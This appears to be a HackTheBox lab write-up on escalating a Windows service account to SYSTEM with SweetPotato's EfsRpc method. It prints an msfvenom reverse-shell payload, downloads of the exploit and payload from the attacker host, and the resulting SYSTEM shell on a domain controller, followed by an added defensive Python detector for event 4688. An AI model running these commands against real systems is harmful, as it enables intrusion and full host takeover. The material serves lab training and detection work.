SweetPotato
The sqlsvc user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of exploits. While JuicyPotato for token impersonation does not work on anything above Windows 10 1809 and Windows Server 2019, I should be able to use SweetPotato.
SweetPotato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @_EthicalChaos_ and includes:
- RottenPotato
- Weaponized JuicyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploit
The binary can be downloaded from the official GitHub repo
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe -o pe.exe
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 460 bytes
final size of exe file: 7168 bytes
saved as: pe.exe
msfvenom generated a reverse shell executable
ps c:\Temp> iwr http://10.10.14.9/SweetPotato.exe -outfile C:\Temp\SweetPotato.exe
ps c:\Temp> iwr http://10.10.14.9/pe.exe -outfile C:\Temp\pe.exe
Delivery complete
ps c:\Temp> .\SweetPotato.exe -e EfsRpc -p 'C:\Temp\pe.exe' -l 5555
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\Temp\pe.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3/\2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3\2c8fd1bb-e14b-4b33-b9ae-cf401cc50ce3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
The command above uses the EfsRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw call and relies on SeImpersonatePrivilege. This method does not even require tunneling, but it does require a binary to launch upon successful exploitation: by default it launches cmd.exe, which I would not be able to see, as I only have access to console sessions and no interactive sessions.
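As an added defender-side example (not code from the writeup or from the SweetPotato project), the following Python heuristic triages Windows Security event 4688 records for the token mismatch a Potato-style impersonation leaves behind: a service account such as sqlsvc creating a process whose token is NT AUTHORITY\SYSTEM. The event records and the watched-account list are constructed sample data and assumptions for this example.

```python
# Heuristic triage of Security event 4688 for potato-style impersonation.
# On Windows 8.1 / Server 2012 R2 and later, 4688 carries both the creator
# (SubjectUserName) and, when a different token was used, the account the new
# process runs as (TargetUserName, "-" when no separate token was supplied).

HIGH_PRIV_ACCOUNTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}
# Service accounts known to hold SeImpersonatePrivilege (assumption for this example).
WATCHED_SERVICE_ACCOUNTS = {"SQLSVC"}

# Constructed sample records shaped like 4688 fields; all values are invented.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "sqlsvc", "TargetUserName": "SYSTEM",
     "NewProcessName": "C:\\Temp\\pe.exe",
     "ParentProcessName": "C:\\Temp\\SweetPotato.exe"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM", "TargetUserName": "-",
     "NewProcessName": "C:\\Windows\\System32\\svchost.exe",
     "ParentProcessName": "C:\\Windows\\System32\\services.exe"},
    {"EventID": 4688, "SubjectUserName": "alice", "TargetUserName": "-",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},
    {"EventID": 4624, "SubjectUserName": "sqlsvc", "TargetUserName": "SYSTEM"},
]


def token_mismatch_reasons(event):
    """Return why a 4688 record looks like token impersonation, or [] if benign."""
    if event.get("EventID") != 4688:
        return []
    subject = event.get("SubjectUserName", "").upper()
    target = event.get("TargetUserName", "-").upper()
    if target in ("", "-") or target == subject:
        return []  # ordinary CreateProcess: no foreign token involved
    if target not in HIGH_PRIV_ACCOUNTS or subject in HIGH_PRIV_ACCOUNTS:
        return []  # cross-token creation, but not a jump to a privileged account
    reasons = [f"{subject} created a process running as {target}"]
    if subject in WATCHED_SERVICE_ACCOUNTS:
        reasons.append(f"{subject} is a service account holding SeImpersonatePrivilege")
    parent = event.get("ParentProcessName", "")
    if not parent.upper().startswith("C:\\WINDOWS\\"):
        reasons.append(f"parent {parent} lives outside C:\\Windows")
    return reasons


def find_potato_candidates(events):
    """Return (event, reasons) pairs that an analyst should look at."""
    flagged = []
    for ev in events:
        reasons = token_mismatch_reasons(ev)
        if reasons:
            flagged.append((ev, reasons))
    return flagged
```

Running it over the sample set flags only the pe.exe launch, with three reasons; the svchost.exe and notepad.exe records and the 4624 event are ignored.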
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 63771
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
whoami
nt authority\system
c:\Windows\system32> hostname
hostname
DC1
c:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::181
ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
ipv4 address. . . . . . . . . . . : 10.10.11.168
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
10.10.10.2
System Level Compromise